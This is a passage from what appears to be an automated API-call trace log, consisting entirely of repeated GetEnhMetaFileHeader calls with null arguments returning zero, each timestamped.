0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] 